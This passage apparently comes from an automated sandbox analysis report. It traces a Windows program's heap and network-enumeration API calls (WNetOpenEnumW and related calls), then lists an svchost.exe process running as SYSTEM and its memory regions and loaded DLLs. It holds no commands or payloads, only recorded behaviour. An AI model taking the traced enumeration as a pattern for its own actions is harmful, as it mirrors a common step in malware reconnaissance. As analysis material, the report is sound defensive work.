hHeap=0x2c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05828 | out: hHeap=0x2c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a057e0 | out: hHeap=0x2c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff060 | out: hHeap=0x2c0000) returned 1 [0199.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0199.979] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2ad22a0, lphEnum=0x309fe28 | out: lphEnum=0x309fe28*=0x309fe44) returned 0x4c6 [0199.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.985] WNetEnumResourceW (in: hEnum=0x2a05d28, lpcCount=0x309fedc, lpBuffer=0x2ad2260, lpBufferSize=0x309fed8 | out: lpcCount=0x309fedc, lpBuffer=0x2ad2260, lpBufferSize=0x309fed8) returned 0x103 [0199.985] WNetCloseEnum (hEnum=0x2a05d28) returned 0x0 [0199.985] SendMessageW (hWnd=0x30144, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18a14000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1bc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dd3c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2053 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2054 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2055 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2056 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2057 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2058 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2059 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2060 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2061 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2062 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2063 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2064 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2065 start_va = 0x1a0000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2066 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2067 start_va = 0x3a0000 end_va = 0x527fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2068 start_va = 0x530000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2069 start_va = 0x6c0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2070 start_va = 0x780000 end_va = 0x78afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 2071 start_va = 0x790000 end_va = 0x79cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2072 start_va = 0x7a0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2073 start_va = 0x820000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 2074 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2075 start_va = 0x8b0000 end_va = 0x8b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2076 start_va = 0x8c0000 end_va = 0x8c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 2077 start_va = 0x8d0000 end_va = 0x8d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 2078 start_va = 0x8e0000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2079 start_va = 0x960000 end_va = 0x967fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 2080 start_va = 0x970000 end_va = 0x971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 2081 start_va = 0x980000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 2082 start_va = 0xa00000 end_va = 0xa03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2083 start_va = 0xa10000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 2084 start_va = 0xa90000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2085 start_va = 0xb10000 end_va = 0xb13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2086 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 2087 start_va = 0xba0000 end_va = 0xe6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2088 start_va = 0xe70000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 2089 start_va = 0xef0000 end_va = 0xefdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 2090 start_va = 0xf00000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 2091 start_va = 0xf10000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 2092 start_va = 0xf40000 end_va = 0xf40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 2093 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2094 start_va = 0xff0000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 2095 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 2096 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2097 start_va = 0x1180000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 2098 start_va = 0x1200000 end_va = 0x1265fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2099 start_va = 0x1270000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 2100 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 2101 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2102 start_va = 0x1440000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 2103 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 2104 start_va = 0x1560000 end_va = 0x15dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 2105 start_va = 0x15e0000 end_va = 0x16dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 2106 start_va = 0x1700000 end_va = 0x177ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2107 start_va = 0x17c0000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 2108 start_va = 0x1890000 end_va = 0x190ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 2109 start_va = 0x1960000 end_va = 0x19dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 2110 start_va = 0x19f0000 end_va = 0x1a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 2111 start_va = 0x1a70000 end_va = 0x1aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 2112 start_va = 0x1b40000 end_va = 0x1b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2113 start_va = 0x1b90000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 2114 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 2115 start_va = 0x1d40000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2116 start_va = 0x1dc0000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 2117 start_va = 0x1e80000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 2118 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2119 start_va = 0x2030000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2120 start_va = 0x20c0000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2121 start_va = 0x21c0000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2122 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 2123 start_va = 0x2350000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2124 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 2125 start_va = 0x24b0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 2126 start_va = 0x2540000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 2127 start_va = 0x25c0000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 2128 start_va = 0x2640000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 2129 start_va = 0x26d0000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 2130 start_va = 0x2770000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2131 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2132 start_va = 0x28b0000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2133 start_va = 0x2930000 end_va = 0x2a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 2134 start_va = 0x2a60000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 2135 start_va = 0x2b30000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 2136 start_va = 0x2c20000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 2137 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2138 start_va = 0x2d80000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2139 start_va = 0x2ed0000 end_va = 0x2f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 2140 start_va = 0x2f50000 end_va = 0x314ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2141 start_va = 0x3180000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2142 start_va = 0x3240000 end_va = 0x32bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 2143 start_va = 0x32c0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2144 start_va = 0x33d0000 end_va = 0x344ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2145 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 2146 start_va = 0x3590000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 2147 start_va = 0x3630000 end_va = 0x36affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2148 start_va = 0x36c0000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 2149 start_va = 0x3770000 end_va = 0x37effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 2150 start_va = 0x3840000 end_va = 0x38bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 2151 start_va = 0x3970000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 2152 start_va = 0x3b80000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 2153 start_va = 0x76ba0000 end_va = 0x76c99fff monitored = 0 entry_point = 0x76bba2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2154 start_va = 0x76ca0000 end_va = 0x76dbefff monitored = 0 entry_point = 0x76cb5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2155 start_va = 0x76dc0000 end_va = 0x76f68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2156 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2157 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2158 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2159 start_va = 0xff1d0000 end_va = 0xff1dafff monitored = 0 entry_point = 0xff1d246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2160 start_va = 0x7fef6a70000 end_va = 0x7fef6b5dfff monitored = 0 entry_point = 0x7fef6a712a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2161 start_va = 0x7fef89f0000 end_va = 0x7fef89fbfff monitored = 0 entry_point = 0x7fef89f602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2162 start_va = 0x7fef8ed0000 end_va = 0x7fef8f40fff monitored = 0 entry_point = 0x7fef8f151d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2163 start_va = 0x7fef8f50000 end_va = 0x7fef8f61fff monitored = 0 entry_point = 0x7fef8f589d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2164 start_va = 0x7fef8f70000 end_va = 0x7fef9024fff monitored = 0 entry_point = 0x7fef8fecf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2165 start_va = 0x7fef9080000 end_va = 0x7fef9099fff monitored = 0 entry_point = 0x7fef9093fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2166 start_va = 0x7fef90a0000 end_va = 0x7fef9113fff monitored = 0 entry_point = 0x7fef90a66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2167 start_va = 0x7fef9120000 end_va = 0x7fef918afff monitored = 0 entry_point = 0x7fef9164344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2168 start_va = 0x7fef9190000 end_va = 0x7fef9197fff monitored = 0 entry_point = 0x7fef9191414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2169 start_va = 0x7fef91a0000 end_va = 0x7fef9223fff monitored = 0 entry_point = 0x7fef91f1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 2170 start_va = 0x7fef9230000 end_va = 0x7fef9289fff monitored = 0 entry_point = 0x7fef926dde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2171 start_va = 0x7fef9290000 end_va = 0x7fef92b0fff monitored = 0 entry_point = 0x7fef92a03b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2172 start_va = 0x7fef92c0000 end_va = 0x7fef92d2fff monitored = 0 entry_point = 0x7fef92c1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2173 start_va = 0x7fef92e0000 end_va = 0x7fef9341fff monitored = 0 entry_point = 0x7fef931bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2174 start_va = 0x7fef9350000 end_va = 0x7fef947bfff monitored = 0 entry_point = 0x7fef9400ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2175 start_va = 0x7fef9480000 end_va = 0x7fef94c6fff monitored = 0 entry_point = 0x7fef9481040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2176 start_va = 0x7fef94d0000 end_va = 0x7fef9511fff monitored = 0 entry_point = 0x7fef94d17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2177 start_va = 0x7fef9520000 end_va = 0x7fef952dfff monitored = 0 entry_point = 0x7fef9525500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2178 start_va = 0x7fef9530000 end_va = 0x7fef9556fff monitored = 0 entry_point = 0x7fef95311a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2179 start_va = 0x7fef9560000 end_va = 0x7fef9632fff monitored = 0 entry_point = 0x7fef95d8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2180 start_va = 0x7fef96b0000 end_va = 0x7fef9741fff monitored = 0 entry_point = 0x7fef97251ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2181 start_va = 0x7fef9750000 end_va = 0x7fef9768fff monitored = 0 entry_point = 0x7fef9751104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2182 start_va = 0x7fef9770000 end_va = 0x7fef97bffff monitored = 0 entry_point = 0x7fef9771190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2183 start_va = 0x7fef97c0000 end_va = 0x7fef97c7fff monitored = 0 entry_point = 0x7fef97c1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2184 start_va = 0x7fef97d0000 end_va = 0x7fef97f4fff monitored = 0 entry_point = 0x7fef97e8c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 2185 start_va = 0x7fef9800000 end_va = 0x7fef983cfff monitored = 0 entry_point = 0x7fef9801070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2186 start_va = 0x7fef9850000 end_va = 0x7fef9866fff monitored = 0 entry_point = 0x7fef9851060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2187 start_va = 0x7fef9870000 end_va = 0x7fef9a1ffff monitored = 0 entry_point = 0x7fef9871010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2188 start_va = 0x7fef9a40000 end_va = 0x7fef9ab6fff monitored = 0 entry_point = 0x7fef9a7e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2189 start_va = 0x7fef9cd0000 end_va = 0x7fef9d09fff monitored = 0 entry_point = 0x7fef9ced020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2190 start_va = 0x7fefa210000 end_va = 0x7fefa286fff monitored = 0 